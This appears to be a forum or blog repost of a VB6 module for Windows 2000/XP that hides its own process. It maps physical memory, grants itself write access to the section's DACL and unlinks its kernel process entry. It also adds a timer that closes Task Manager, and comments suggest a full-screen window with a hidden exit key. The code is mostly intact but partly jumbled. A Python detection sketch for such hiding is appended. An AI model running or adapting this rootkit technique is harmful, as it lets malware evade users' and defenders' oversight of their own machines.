Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Sub Form_Load()
Option Explicit
' NTSTATUS and Win32 result codes
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
' Section object access rights
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDescriptor As Long) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type
Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
    ' Hides the current application's process in the process list.
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                ' Offsets of the list links and PID differ per OS version
                Select Case verinfo.dwMinorVersion
                    Case 0 ' Windows 2000
                        lOffsetFlink = &HA0
                        lOffsetBlink = &HA4
                        lOffsetPID = &H9C
                    Case 1 ' Windows XP
                        lOffsetFlink = &H88
                        lOffsetBlink = &H8C
                        lOffsetPID = &H84
                End Select
            End If
        End If
    End If
    If OpenPhysicalMemory <> 0 Then
        thread = GetData(&HFFDFF124)
        process = GetData(thread + &H44)
        fw = GetData(process + lOffsetFlink)
        bw = GetData(process + lOffsetBlink)
        ' Unlink: the neighbours now point past this entry
        SetData fw + 4, bw
        SetData bw, fw
        CloseHandle g_hMPM
    End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS
    ' Read the section's current DACL
    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
    ' Build an entry granting SECTION_MAP_WRITE to the current user
    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER
    ea.Trustee.ptstrName = "CURRENT_USER" & vbNullChar
    ' Merge the entry into the DACL and write it back
    SetEntriesInAcl 1, ea, pDacl, pNewDacl
    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
    LocalFree pSD
    LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES
    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDescriptor = 0
    Attributes.SecurityQualityOfService = 0
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
        ' Reopen with WRITE_DAC, change the DACL, then retry read/write
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
        SetPhyscialMemorySectionCanBeWrited g_hMPM
        CloseHandle g_hMPM
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    End If
    Dim lDirectoty As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                ' Physical address of the page directory, per OS version
                Select Case verinfo.dwMinorVersion
                    Case 0 ' Windows 2000
                        lDirectoty = &H30000
                    Case 1 ' Windows XP
                        lDirectoty = &H39000
                End Select
            End If
        End If
    End If
    If Status = 0 Then
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
        If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
End Function
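Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    ' Translates a linear address to a physical one via the x86 two-level page tables.
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long
    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    ' Top 10 bits of the address index the page directory
    lTemp = Fix(byteartlong(aByte) / (2 ^ 22))
    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4
    If (PGDE And 1) <> 0 Then ' present bit
        lTemp = PGDE And &H80 ' page-size bit: 4 MB page
        If lTemp <> 0 Then
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
        Else
            ' Map the page table and read the entry for the middle 10 bits
            PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
            lTemp = (VAddr And &H3FF000) / (2 ^ 12)
            PTE = PGDE + lTemp * 4
            CopyMemory PTE, ByVal PTE, 4
            If (PTE And 1) <> 0 Then
                PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
                UnmapViewOfFile PGDE
            End If
        End If
    End If
    LinearToPhys = PAddr
End Function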
Private Function GetData(addr As Long) As Long
    ' Reads one DWORD at the given linear address through the physical-memory section.
    Dim phys As Long, tmp As Long, ret As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
        CopyMemory ret, ByVal ret, 4
        UnmapViewOfFile tmp
        GetData = ret
    End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    ' Writes one DWORD at the given linear address through the physical-memory section.
    Dim phys As Long, tmp As Long, x As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
        CopyMemory ByVal x, data, 4
        UnmapViewOfFile tmp
        SetData = True
    End If
End Function
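Private Function byteartlong(inByte() As Byte) As Double
    ' Converts four little-endian bytes to an unsigned value held in a Double.
    Dim I As Integer
    For I = 0 To 3
        byteartlong = byteartlong + inByte(I) * (&H100 ^ I)
    Next I
End Function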
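Private Sub Timer1_Timer()
    ' Find the Task Manager window by its title and send it WM_CLOSE (&H10)
    hw = FindWindow(vbNullString, "Windows任務管理器")
    SendMessage hw, &H10, 0, 0
    SendKeys "%"
    Me.SetFocus
End Sub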
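That was terrifying~~~ I almost couldn't get it back.
If I hadn't been running it inside VB, I really wouldn't have known how to exit.
It would be even cooler with the form's style set to None and its startup state set to Maximized.
If you are worried about not being able to exit, you can do this:
Private Sub Form_KeyDown(KeyCode As Integer, Shift As Integer)
    If KeyCode = Asc("I") Then End
End Sub
Then you can exit just by pressing the "I" key.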
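VB code for hiding a process on XP/2K systems
Attribute VB_Name = "modHideProcess"
'-------------------------------------------------
' Module name: modHideProcess.bas
'
' Module function: hides the current process in the process list of the XP/2K Task Manager.
'
' Usage: call HideCurrentProcess() directly
'
' Module author: retrieved from the Internet; original author unknown.
'
' Revision date: August 26, 2006
'-------------------------------------------------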
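HideCurrentProcess only rewrites its neighbours' Flink and Blink, so the process record stays in memory with its own links intact, which is what cross-view detection in memory forensics relies on. The Python sketch below is an added example, not part of the original module: it uses an assumed 16-byte toy record layout (not the real EPROCESS) and constructed PIDs, and compares a list walk against a tag scan of the same image.

```python
import struct

# Toy model (assumed layout, NOT the real EPROCESS): 16-byte records
#   +0 tag "Proc" | +4 pid | +8 Flink | +12 Blink ; links point at a record's +8.
REC, TAG, LINK = 16, b"Proc", 8

def build_image(pids, base=0x100):
    """Constructed sample: records laid out back to back in one circular list."""
    img = bytearray(base + REC * len(pids))
    addrs = [base + i * REC for i in range(len(pids))]
    for i, pid in enumerate(pids):
        nxt, prev = addrs[(i + 1) % len(pids)], addrs[i - 1]
        struct.pack_into("<4sIII", img, addrs[i], TAG, pid, nxt + LINK, prev + LINK)
    return img, addrs

def unlink(img, rec):
    """State the page's code leaves behind: neighbours skip rec, rec is untouched."""
    fw, bw = struct.unpack_from("<II", img, rec + LINK)
    struct.pack_into("<I", img, fw + 4, bw)   # fw->Blink = bw
    struct.pack_into("<I", img, bw, fw)       # bw->Flink = fw

def walk_list(img, head):
    """View 1: follow Flink from a known-good head, as a process lister does."""
    pids, entry = [], head + LINK
    for _ in range(len(img) // REC):          # bound the walk against loops
        pids.append(struct.unpack_from("<I", img, entry - LINK + 4)[0])
        entry = struct.unpack_from("<I", img, entry)[0]
        if entry == head + LINK:
            break
    return pids

def scan_records(img):
    """View 2: ignore the links and carve every record by its tag."""
    return {struct.unpack_from("<I", img, off + 4)[0]: off
            for off in range(0, len(img) - REC + 1, 4) if img[off:off + 4] == TAG}

def hidden_pids(img, head):
    """Cross-view diff: carved from memory but not reachable through the list."""
    return sorted(set(scan_records(img)) - set(walk_list(img, head)))

def stale_links(img, rec):
    """A live entry satisfies Flink->Blink == self; an unlinked one does not."""
    fw, _ = struct.unpack_from("<II", img, rec + LINK)
    return struct.unpack_from("<I", img, fw + 4)[0] != rec + LINK

image, records = build_image([4, 408, 1337, 1720])   # constructed PIDs
unlink(image, records[2])
print(hidden_pids(image, records[0]))                 # [1337]
```

The same two signals, a record found by scanning that the list walk never reaches and a record whose forward neighbour no longer points back at it, are what an analyst looks for in a real memory image.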